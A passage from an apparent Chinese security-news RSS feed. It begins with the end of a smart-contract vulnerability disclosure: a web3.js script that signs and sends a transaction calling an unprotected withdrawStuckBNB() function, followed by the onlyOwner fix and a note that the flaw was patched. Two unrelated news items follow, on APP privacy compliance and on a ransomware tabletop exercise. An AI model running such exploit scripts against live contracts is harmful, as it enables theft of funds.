!important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'0xbbbbbbbbbbbbbb'</span>; <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 替换为你的私钥</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> account = web3.eth.accounts.privateKeyToAccount(privateKey);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">web3.eth.accounts.wallet.add(account);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">async function <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">withdrawBNB</span><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">()</span> </span>{</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">try</span>{</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(account.address);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> tx = {</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            from: account.address, <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 必须使用真实地址</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            to: contractAddress,</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            gas: <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(14, 156, 229)">300000</span>,</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">            data: contract.methods.withdrawStuckBNB().encodeABI()</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        };</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 估算 gas</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> gas = await web3.eth.estimateGas(tx);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        tx.gas = gas;</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 获取当前 gasPrice</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> gasPrice = await web3.eth.getGasPrice();</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        tx.gasPrice = gasPrice;</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(175, 175, 175);font-style: italic">// 签名并发送交易（Node.js 方式）</span></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> signedTx = await web3.eth.accounts.signTransaction(tx, privateKey);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">const</span> receipt = await web3.eth.sendSignedTransaction(signedTx.rawTransaction);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'Transaction Hash:'</span>, receipt.transactionHash);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">'Receipt:'</span>, receipt);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    } <span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">catch</span> (error) {</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">        console.error(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"Error:"</span>, error);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    }</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">    console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"2"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">}</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">withdrawBNB();</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">console.<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(202, 125, 55)">log</span>(<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(221, 17, 68)">"3"</span>);</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important">```</span></code><code style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;white-space: pre;display: flex;position: relative;font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace;box-sizing: border-box !important;overflow-wrap: break-word !important"><span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 1000%;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></span></code></p></pre></section><p><br/></p><section><section><section><section><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"><strong style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important">6、</strong><strong style="-webkit-tap-highlight-color: transparent; padding: 0px; outline: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;">修复方案</strong></p></section></section></section></section></section><p><br/></p><section><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">在withdrawStuckBNB函数中添加onlyOwner修饰，只允许owner可以调用这个函数</p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;"> </p></section><section><pre style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 1em 1em 1em 0px;outline: 0px;max-width: 1000%;overflow-x: auto;white-space: normal;flex: 1 1 0%;box-sizing: border-box !important;overflow-wrap: break-word !important"><p style="text-indent: 0em;">```solidity<br/>function withdrawStuckBNB() external onlyOwner {    <br/>(bool success,) = marketingAddress.call{value: address(this).balance}("");    <br/>require(success, "Transfer failed");<br/>}<br/>```<br/></p></pre></section><section><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></p><p style="-webkit-tap-highlight-color: transparent; margin-top: 0px; margin-bottom: 0px; padding: 0px; outline: 0px; max-width: 100%; clear: both; min-height: 1em; text-indent: 0em; box-sizing: border-box !important; overflow-wrap: break-word !important;">   该漏洞目前<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;font-family: 'PingFang SC', system-ui, -apple-system, 'system-ui', 'Helvetica Neue', 'Hiragino Sans GB', 'Microsoft YaHei UI', 'Microsoft YaHei', Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);box-sizing: border-box !important;overflow-wrap: break-word !important">已向相关单位和厂商报送并已推出补丁，<span style="-webkit-tap-highlight-color: transparent;padding: 0px;outline: 0px;max-width: 100%;letter-spacing: 0.544px;box-sizing: border-box !important;overflow-wrap: break-word !important">使用此漏洞造成的任何攻击影响均与本文作者无关。</span></span></p><p style="-webkit-tap-highlight-color: transparent;margin-top: 0px;margin-bottom: 0px;padding: 0px;outline: 0px;max-width: 100%;clear: both;min-height: 1em;box-sizing: border-box !important;overflow-wrap: break-word !important"><br/></p></section><p style="text-indent: 0em;"><a href="https://mp.weixin.qq.com/s/wDjly6wOmBucSo9DnmpgTw" target="_self">原文链接</a></p>]]></description> <pubDate>Thu, 03 Apr 2025 10:51:15 +0800</pubDate> <author>盛邦安全</author> </item> <item> <title><![CDATA[APP合规公益行 | 解构 "链式唤醒隐蔽收集诱导授权" 三大典型违规场景，聚焦个人信息保护行动]]></title> <link><![CDATA[https://www.4hou.com/posts/42Jx]]></link> <description><![CDATA[<p>3月31日，由上海市通信管理局指导、上海市互联网协会主办的“APP合规安全公益行”在上海浦东软件园盛大举行。此次活动围绕APP合规安全的关键议题展开深入交流，共同探寻行业未来发展的新路径，致力于推动APP行业实现健康、有序、可持续的发展。<strong>梆梆安全受邀出席作主题分享，深度剖析典型场景下的隐私合规技术实践</strong>。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743645662656862.png" title="1743645662656862.png" alt="640.png"/></p><p>上海市互联网协会副秘书长姜国致辞，着重强调构建健康、安全、有序的APP生态系统迫在眉睫。当前，恶意软件肆虐、个人信息违规收集以及数据泄露等问题频发，严重威胁着用户权益、行业发展乃至社会稳定。只有打造规范的APP生态，才能为行业持续创新发展筑牢根基，切实保障广大用户的合法权益。<br/></p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743645675924547.png" title="1743645675924547.png" alt="640-1.png"/></p><p style="text-align: center;"><span style="font-size: 14px;">上海市互联网协会副秘书长姜国</span><br/></p><p>会议期间，上海市通信管理局移动互联网工作组专家钱艺玮女士详细讲解了2025年APP用户权益保护监督管理重点部署。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743645685192866.png" title="1743645685192866.png" alt="640-2.png"/></p><p style="text-align: center;"><span style="font-size: 14px;">上海市通信管理局移动互联网工作组专家钱艺玮</span><br/></p><p>在主题分享环节，梆梆安全合规专家王毅发表《移动互联网应用隐私合规技术》演讲，<strong>结合隐私合规监管要求以及典型案例，深入剖析APP的隐私合规标准以及在“违法违规收集个人信息、自启动及关联启动滥用、欺骗诱导用户授权”等高发违规场景下的合规安全实操技术重点</strong>。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743645697931650.png" title="1743645697931650.png" alt="640-3.png"/></p><p style="text-align: center;"><span style="font-size: 14px;">梆梆安全合规专家王毅</span><br/></p><p>会议最后，上海市通信管理局互联网管理处纪容对会议进行总结，对本次活动的成果给予肯定，并鼓励各方继续携手合作，共同推进APP合规安全工作。纪容指出，在上海市通信管理局的指导下，通过各方共同努力，一定能够构建一个安全、透明、可信赖的APP使用环境，为用户提供更加优质、安全的服务。</p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250403/1743645706127247.png" title="1743645706127247.png" alt="640-4.png"/></p><p style="text-align: center;"><span style="font-size: 14px;">上海市通信管理局互联网管理处纪容</span><br/></p><p>本次 “APP合规安全公益行” 活动为行业搭建了一个交流与合作的平台，通过政策解读、技术分享和案例分析，提高了企业对APP合规安全的重视程度，增强企业应对合规安全挑战的能力。</p><p>梆梆安全作为个人信息保护生态建设的守护者，依托多年技术沉淀，<strong>以为“自动化检测+人工审查”形式，提供从合规检测、风险评估到整改落地的个人信息隐私合规评估及咨询服务，帮助用户发现多业务场景下的应用违规行为</strong>，助力企业构建符合监管要求的移动安全防护体系。针对近期在业务场景中高频发生的违法违规收集使用个人信息典型问题，梆梆安全提供合规建议如下：</p><p><strong><span style="font-size: 18px;">1. 自启动和关联启动场景</span></strong></p><p>合规建议：确因业务实现需要的自启动行为，需要在隐私政策中明确说明自启动的主体、场景及业务必要性；须征得用户同意隐私政策后启动；不得存在结束进程/伴随系统启动而启动的自启动行为；须区分自身或第三方SDK的自启动行为。</p><p><strong><span style="font-size: 18px;">2. 个人信息收集场景</span></strong></p><p>合规建议：APP需设置隐私政策、明确收集使用个人信息规则；明确APP使用个人信息的目的、方式、范围等；APP首次运行时以弹窗提示用户阅读隐私政策（不得默认勾选）；隐私政策同意前/拒绝后，不得收集个人信息；不得超出授权范围收集个人信息；遵循最小必要原则；仅收集与当前场景相关的个人信息。</p><p><strong><span style="font-size: 18px;">3. 欺骗误导用户授权场景</span></strong></p><p>合规建议：关闭/跳过按钮应明显、有效；不能全局跳转，需设置跳转控件；摇一摇重力感应需满足参数要求；推荐下载需明示开发运营者、产品功能、隐私政策、权限列表等必要信息，不得“偷梁换柱，强制捆绑，静默下载”。</p><p>近日，四部委联合启动2025年个人信息保护系列专项行动，将针对“App（含小程序、公众号、快应用）、SDK、智能终端、人脸识别”等六大违法违规收集使用个人信息典型问题开展集中治理，切实保护公民个人信息安全，督促指导个人信息处理者不断提升合规水平。</p><p>在数字经济与合规监管的双重驱动下，梆梆安全始终以"技术赋能合规"为核心战略，深耕移动安全技术研发，为企业构建覆盖全生命周期的数据安全防护体系。未来，公司将持续深化人工智能技术在隐私合规领域的融合应用，打造智能化、动态化的防护体系，为个人信息保护筑造坚实的技术防线，助力企业在合规道路高质量发展。</p>]]></description> <pubDate>Thu, 03 Apr 2025 10:12:30 +0800</pubDate> <author>梆梆安全</author> </item> <item> <title><![CDATA[勒索病毒推演全记录：丈八兵棋推演系统重构企业安全决策链]]></title> <link><![CDATA[https://www.4hou.com/posts/2Xoz]]></link> <description><![CDATA[<p>2025年3月31日，由国家工业信息安全发展研究中心、河北雄安新区改革发展局、河北雄安新区工信科技数据局联合主办，中国雄安集团数字城市科技有限公司承办的“第八届工业信息安全技能大赛全国总决赛（以下简称“总决赛”）”在河北雄安新区成功举办。其中，北京丈八网络安全科技有限公司作为总决赛技术支撑单位，在大赛专题研讨会环节主导了一次别开生面的“互动式勒索病毒推演演练”，并围绕自主研发的丈八兵棋推演系统进行了技术分享，受到现场专家广泛认可和关注。<br/></p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743582223117603.png" title="1743582223117603.png" alt="图片4.png"/></p><p>本届总决赛旨在贯彻落实《网络安全法》《数据安全法》等相关法律法规和文件要求，深度践行全国新型工业化推进大会“统筹高质量发展与高水平安全”的战略部署，全面服务制造强国、网络强国建设，以护航「人工智能+高端制造」保障“未来之城”安全发展为主题。其中，研讨会主题围绕“大型企业防勒索病毒实战推演”展开，这也是目前政府、大型央国企聚焦的网络安全和数据安全的重点方向。会议创新性引入了由丈八网安主导的互动式推演模式，来自国家工业信息安全发展研究中心、极智信、烽台科技、能嘉科技、赵亿科技、国际能源创新中心等机构和企业的专家学者、代表出席，并以决策者视角共同参与了这场沉浸式推演演练。<br/></p><p style="text-align:center"><img src="https://img.4hou.com/uploads/ueditor/php/upload/image/20250402/1743582245986535.png" 